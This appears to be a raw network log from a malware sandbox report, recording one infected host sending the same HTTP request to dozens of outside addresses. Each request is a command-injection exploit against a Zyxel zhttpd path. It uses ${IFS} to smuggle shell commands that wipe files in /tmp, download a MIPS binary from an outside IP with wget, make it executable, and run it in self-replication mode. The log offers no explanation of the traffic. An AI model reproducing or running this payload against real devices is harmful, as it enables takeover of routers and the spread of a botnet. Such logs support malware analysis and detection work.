                                        Jan 14, 2024 16:18:48.539177895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5214192.168.2.1335956192.230.229.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539216042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5215192.168.2.13499668.58.122.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539273977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5216192.168.2.1359036133.8.29.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539315939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5217192.168.2.1354006136.182.213.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539359093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5218192.168.2.134618623.162.174.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539387941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5219192.168.2.1355368131.112.192.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539438963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5220192.168.2.135597676.34.213.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539484024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5221192.168.2.1336276190.64.14.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539515018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5222192.168.2.1333150190.191.103.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539581060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5223192.168.2.1344394188.83.63.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539602995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5224192.168.2.136061666.65.185.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539638042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5225192.168.2.1347988145.252.211.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539697886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5226192.168.2.1351680171.204.20.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539726973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5227192.168.2.134404658.250.152.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539762974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5228192.168.2.1341334133.251.248.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539792061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5229192.168.2.13507961.215.75.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539829016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5230192.168.2.1356808108.161.234.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539865971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5231192.168.2.1332796124.16.62.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539884090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5232192.168.2.135208217.140.184.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539921045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5233192.168.2.135163289.168.120.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539963961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5234192.168.2.1360182204.11.218.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539988995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5235192.168.2.134847259.214.105.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540031910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5236192.168.2.1335494171.54.117.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540074110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5237192.168.2.1360070204.16.72.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540107012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5238192.168.2.1348694151.70.126.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540137053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5239192.168.2.133688491.153.145.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540174961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5240192.168.2.1343002102.61.91.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540184975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5241192.168.2.1336560130.55.67.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540252924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5242192.168.2.1337428156.0.153.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540304899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5243192.168.2.1353194213.14.189.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540334940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5244192.168.2.13359262.46.217.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540391922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5245192.168.2.135305699.252.69.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540414095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5246192.168.2.13549781.148.55.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540457010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5247192.168.2.134369470.18.151.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540517092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5248192.168.2.1339492207.85.92.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540529013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5249192.168.2.1351652164.251.95.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540577888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5250192.168.2.1353724184.120.107.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540605068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5251192.168.2.1344124169.196.179.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540643930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5252192.168.2.1355652207.189.150.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540673018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5253192.168.2.133484246.104.35.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540698051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5254192.168.2.1358200153.85.249.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540730000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5255192.168.2.1334364216.134.115.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540807009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5256192.168.2.134706264.214.61.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540844917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5257192.168.2.1347712150.179.33.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540867090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5258192.168.2.1359062129.54.98.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540915012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5259192.168.2.134246667.126.91.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540934086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5260192.168.2.134087618.141.42.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.540992022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5261192.168.2.135018862.83.56.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541033983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5262192.168.2.135021466.186.181.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541068077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5263192.168.2.1345538133.48.253.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541116953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5264192.168.2.1333134198.203.103.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541129112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5265192.168.2.1342948143.167.35.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541186094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5266192.168.2.1357878107.54.105.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541225910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5267192.168.2.1335596124.132.171.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541266918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5268192.168.2.1337684103.57.202.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541305065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5269192.168.2.135867861.26.211.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541337013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5270192.168.2.1337510199.197.53.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541387081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5271192.168.2.1355094120.111.222.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541429043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5272192.168.2.134565445.237.236.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541500092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5273192.168.2.1356374187.188.228.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541501999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5274192.168.2.135210423.176.32.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541529894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5275192.168.2.13568525.183.68.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.541575909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5276192.168.2.1339644196.107.119.22443
                                        TimestampBytes transferredDirectionData
